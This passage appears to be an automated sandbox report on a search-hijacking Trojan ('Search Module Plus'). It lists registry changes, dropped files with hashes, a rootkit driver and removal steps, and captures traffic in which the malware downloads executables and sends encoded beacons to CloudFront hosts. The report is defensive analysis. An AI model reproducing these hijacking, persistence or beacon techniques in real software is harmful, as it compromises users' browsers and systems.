"SuggestionsURL" = "http://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}"
"FaviconURL" = "http://www-searching.com/favicon.ico"

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASMANCS]
"ConsoleTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process tcpsvcs.exe:1504 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\SearchModulePlus\Info]
"Version" = "2.3.12.1634"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\smu.exe]
"Plus" = "1"
"(Default)" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe"

[HKLM\SOFTWARE\SearchModulePlus\Info]
"ExeLocation" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Search Module Plus]
"DisplayIcon" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus\smUninstall.exe"
"UninstallString" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus\smUninstall.exe"
"DisplayName" = "Search Module Plus"
"Publisher" = "Goobzo"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\SearchModulePlus\Info]
"Aff" = "FAAzamodk0,99999999-9999-4180-88c6-7a076893e507,"
"UserId" = "732923889-1296844034-1208581001"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\smu.exe]
"Install" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

Dropped PE files

MD5 | File path
c5bf0ea484893a959b3ef0e7f041f379 | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\SBIEBrowserHelperObject.dll
29f111a07a51d38b8379171d3cf39ddb | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\SMUninstall.exe
2dd50829f5ce91e033636553405263ca | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\Updater.exe
a879b0ae2ad98ac8e1c0f8912837eb2d | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\rlz_id.dll
5931f1438015a3e263226d6ea4a8b182 | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\sma.exe
675f7fdc1224c197df5e7eef84d1a8f9 | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smci32.dll
10ba4048085923cf264eaeee708e98ab | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smi32.exe
4db4b7e64f2fb4e5394d085afb429280 | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smp.exe
556b1f1d6fd1f191c77b1167cd006abc | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smu.exe
c9828a10a4b5644cf236b1cce749dddb | c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smw.sys
05c47da12b0009bd98653f51287f7768 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Install_22888\bxsdk32.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\??\%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys", the Trojan controls the creation and closing of threads by installing a thread notifier.

Using the driver "\??\%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys", the Trojan controls the loading of executable images into memory by installing a load-image notifier.


Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Scan the system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    smu.exe:2540
    smu.exe:3356
    sma.exe:308
    sma.exe:4008
    sma.exe:3164
    sma.exe:3192
    %original file name%.exe:3380
    %original file name%.exe:264
    smp.exe:3444
    smp.exe:2836
    tcpsvcs.exe:3488
    tcpsvcs.exe:1504

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    C:\ProgramData\SearchModulePlus\smhe.js (407 bytes)
    C:\Windows\Temp\Pre83CF.tmp (601 bytes)
    C:\Windows\Temp\Pre93AB.tmp (601 bytes)
    C:\Windows\Temp\Web93AC.tmp (63 bytes)
    C:\Windows\Temp\Pre83E0.tmp (601 bytes)
    C:\Windows\Temp\Web83D0.tmp (63 bytes)
    C:\Windows\Temp\Web83E1.tmp (63 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Install_13704\%original file name%.exe (7433 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Installytd_6828\%original file name%.exe (7433 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Install_22888\bxsdk32.dll (1192 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Install_9822\%original file name%.exe (7433 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk (2 bytes)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\Search.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\search-metadata.json (95 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Preferences (11028 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\searchplugins\smod.xml (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (9416 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\prefs.js (388 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\SMUninstall.exe (10136 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\sma.exe (8560 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns715C.tmp (14 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\SBIEBrowserHelperObject.dll (3312 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns8C5D.tmp (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsExec.dll (14 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\smci32.dll (45051 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\System.dll (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns85B7.tmp (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\AccD.dll (7392 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\Updater.exe (25776 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns96D9.tmp (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsProcess.dll (12 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\rlz_id.dll (3616 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\smi32.exe (12088 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe (56684 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF8.tmp (245963 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys (784 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\smp.exe (6584 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name:
Product Name:
Product Version: 2.11.0.999
Legal Copyright: Copyright (C) 2014
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.11.0.999
File Description:
Comments:
Language: English (United States)

PE Sections

Name    Virtual Address  Virtual Size  Raw Size  Entropy  Section MD5
.text   4096             760735        760832    4.56168  a9cacf15e913be2edf8056b7b3c7c54e
.rdata  765952           234734        235008    3.03602  c4a59491089058aee935dcac3ad25217
.data   1003520          24872         9216      2.60093  4fa01dc463d1d2fe998b6fb156e49847
.rsrc   1032192          30912         31232     3.43692  ffbcb515ad454512ea92926edc9d30de
.reloc  1064960          48620         48640     4.61783  73b154c681e17bd08459beb64281acae

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /bxsdk32.dll HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dyd9qf154h76q.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Content-Length: 942080

Connection: keep-alive

Date: Thu, 16 Mar 2017 13:47:42 GMT

Last-Modified: Tue, 25 Nov 2014 14:05:45 GMT

ETag: "05c47da12b0009bd98653f51287f7768"

Accept-Ranges: bytes

Server: AmazonS3

Age: 64835

X-Cache: Hit from cloudfront

Via: 1.1 a034346227db119f7e0813186ca2d2c2.cloudfront.net (CloudFront)

X-Amz-Cf-Id: FsDAYkxk2XssNWIwo0JzA2LXQpVjlT2zjtCWJVvPC-tU_XcSyLk26w==

<<< skipped >>>

GET /SetterExeV18.exe HTTP/1.1

Range: bytes=0-249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d11sfnc01fj8ag.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Tue, 28 Jul 2015 20:29:52 GMT

Accept-Ranges: bytes

ETag: "a670962874c9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:55 GMT

Content-Range: bytes 0-249999/520704

X-Cache: Miss from cloudfront

Via: 1.1 27b3a801292660302bc6c8d6a96c71ce.cloudfront.net (CloudFront)

X-Amz-Cf-Id: MJpICvSj2Cydx-1WUjll0t1VA0m2Ma9kx_kASN-RYyDUhX-SsbfcrA==

<<< skipped >>>

GET /SetterExeV18.exe HTTP/1.1

Range: bytes=500000-520703

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d11sfnc01fj8ag.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 20704

Connection: keep-alive

Cache-Control: private

Last-Modified: Tue, 28 Jul 2015 20:29:52 GMT

Accept-Ranges: bytes

ETag: "a670962874c9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

Content-Range: bytes 500000-520703/520704

X-Cache: Miss from cloudfront

Via: 1.1 27b3a801292660302bc6c8d6a96c71ce.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 3GTcsb7j63vuDDgY2d3TJxFAlC8gP__tZGa3NEqL3Ij31jqEzaeSAA==

<<< skipped >>>

GET /SetterExeV18.exe HTTP/1.1

Range: bytes=250000-499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d11sfnc01fj8ag.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Tue, 28 Jul 2015 20:29:52 GMT

Accept-Ranges: bytes

ETag: "a670962874c9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:55 GMT

Content-Range: bytes 250000-499999/520704

X-Cache: Miss from cloudfront

Via: 1.1 0f0009772734d6975e26e0a8bc4716ea.cloudfront.net (CloudFront)

X-Amz-Cf-Id: nVRXnqt6YpKbRAvPpj1frNP0pGRh4MSG72XC7nZe3sGBVCslJyaepA==

<<< skipped >>>

GET /p.ashx?e=obiBp3WOda8YEV9pcuJwXtjCW9 eJMmAWub0ofDzkCEegceCn LKWZkWWo76FGxQr J80GV4qARlUrzhzYzRp9T0p0D2ZyJQsnGPPRmjDA5d2L30lHqijijq6TspxE6m6TnR9dT7ayjH2CJtGrtsnASlhOyjLJ/CbfW9VjeXxBEUN4frQ/ABXA9OLpJMWKahtbjfpf6GllFxBbrJqAIXPkCN9h bV19VAhTD7v1xeC4pGvADS7bOhhWoLVpCM9iEhqt6HrlyoIuXkcHJamqYAkU5MDCXDxgXn558pQYeTa 1l 1OLNhgAaPzXL8pY6Nn8Drm/gTHnKRatpWcD7V21UixaxLjlbxVMF4Batz9n/4= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:55 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: WDJQ_AmQCj3DOUvDNet276USb0n9R5Syp64R51jcdIB_hNelRlGALw==

....

GET /p.ashx?e=aQQpsP6/AW3U0UsIWSR1jVRnyF84anr3YDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB49De26f9ELU77BAEjXP3GmOBvq/txek z3knywc6xSb HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: I3wvhbsz-MuIPBOjIs_Buwbt20jDNtFQUhamXcycquB_sVRdm2wvCw==

....

GET /p.ashx?e=QgW8pN5r26bof2QYjF1uPwq//z5qhHoX0EzYvxMWJRokIQgzNWOGCn 5ot6 EvdWkYIKgNqWBwS9Kbi6m4oCRvcc ZMAWsaKd CV/tiwlgli8v7N56mSgbKWjlfhE4uZvYsjUyDjDPpQHbPfmjbRP4kEtwV0krU/zEwKmF3LBrNhJ1C2zC9NPmVzJiGxHpFRq/ mwRQciAPvbT dq0IdZd990QLzNFTA30wp9ZePTAnJscN vLrCowpfd9Pvun2DZj3l0wecJba60LKguj6icg== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: tpVNEEjPUKsR3xznGiKszFZH6K4UPVtvA5w5sq1NJ5ZqXWFHL7V4kg==

....

GET /p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRlFU7gimmHq/JscN vLrCo14/JpwhTbJacCuTErr5qdU= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: N1k_BQdXgQSTh0-hwGBPdcvAa3SBdpFDQ3fU5nVaf4kKvysGzYRyyQ==

....

GET /p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRDvO0EiF3oHTyyO6Ebs4xmkKABP6K/iqqIBnlKRxyFokkn0XLiH0dH1LtCiNSAKYFf5JnRTepcv7VTVcd9MOBGUtwntjomLvg8OihZvFiIAIMn/yeJ21ljtcBdNV8N7h HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: vj8wThi7a3s8evEhdgzuBZarQwn1qv6TW_2iC4uU7g1LavBzFHaLVQ==

....

GET /p.ashx?e=xY8ohDYpM gO8fn3umFd V2PNcPuKknMw/KXmUS MBMPOudYiEhu9PpaBjL6rcaUmQydu7v0XOmnNguChnjFYyy9pizPgo8YGz00ySamWlnMFAdL1xhsmXw8 OWurQVw3PC7x86FjYgov37HB1B/zlU5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mrl JfVwpv1Wva0hvOLfOrKD/wvFkFqnHHo4G r 3F6T7MDuG8rKmKv5M2lG/K85LIzCdXy2lTPRW3vJOpxfY9B1A6K4wtfvcx1y2OGa7t1CL4lfxm/XoqxEdjLvQZAWuHXAH fOgpHnMH6wMvCefXXf GeemgIzPxkm30CyQo1Eg HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: C8rVeNrqvcLXnIosG24Fli_NXSvxLH2j51CFR7tAe8VeLJ5lTxwLZw==

....

GET /p.ashx?e=XJYuqQQo69dBmScQe cMuF2PNcPuKknMCkdmPrP3LyEPOudYiEhu9PpaBjL6rcaUmQydu7v0XOmnNguChnjFYyy9pizPgo8YGz00ySamWlnMFAdL1xhsmXw8 OWurQVw3PC7x86FjYgov37HB1B/zlU5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mrp7TtIX8b4qVoW979 PTPR/sLIuaJBIVfI4G r 3F6T7f9F3I6C91SWT/e9lpr/riA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:57 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: KxTigRIEcxwbVd0v8l-Jwo1o5sj4ldFuNx8wfL38g27Bqi9y48bnpA==

....

GET /p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqu/rKHYTwtRGYUAvnawhe3hbaBd5qR8ufkww3xXMGSlPc= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:57 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: DKpiBbkiJrOz9FrXnZ89Ew1a4WB6hOyBGJjbT-U2db6JIslC6aDWuA==

....

GET /p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqu/rKHYTwtRGYUAvnawhe3hYcizBU3y3xpkudLwF4whtg= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:57 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: Og9L2kgUApwlrapQyHHerAfAMVdGprj0D5LF_xjtzjfOJNMnlr7p3Q==

....

GET /p.ashx?e=WL9usJOVMsOQs n7i1BIkNjCW9 eJMmApZtSBouT4jcegceCn LKWZkWWo76FGxQr J80GV4qARlUrzhzYzRp9T0p0D2ZyJQsnGPPRmjDA5d2L30lHqijijq6TspxE6m6TnR9dT7ayjH2CJtGrtsnASlhOyjLJ/CbfW9VjeXxBEUN4frQ/ABXA9OLpJMWKahtbjfpf6GllFxBbrJqAIXPlLthe3E5HJFfRWApYRElbXqR4rzu9tChTEzQGoF c24CSOMVPCH eA= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:58 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: b9uR23ouXqBWjc9tDJU8OTmNowr0EMn16S7liZmnoeQeS72XVRw_VQ==

....

GET /p.ashx?e=WL9usJOVMsPlWW0ay34fCUdUxmGl9EyeYDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB/nYE3DWujWaoU2sQ4uGCDUUAvnawhe3hbDffmPgH7pMiQNTh4u5dqPxEMNdFi25Gw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:58 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: I2yw_weYa1bF4D36PoW1hN9W5PQOFh6-BUBVOz50hFEzo5ycZ2t6OQ==

....

GET /p.ashx?e=WL9usJOVMsPlWW0ay34fCUdUxmGl9EyeYDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB/nYE3DWujWaoU2sQ4uGCDUUAvnawhe3hYcizBU3y3xpkudLwF4whtg= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:58 GMT

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: UF5lcNfBdJgA2UzQBxPBz2aP2HuF_tBQN193VZwLiY3Off-O-5QicA==

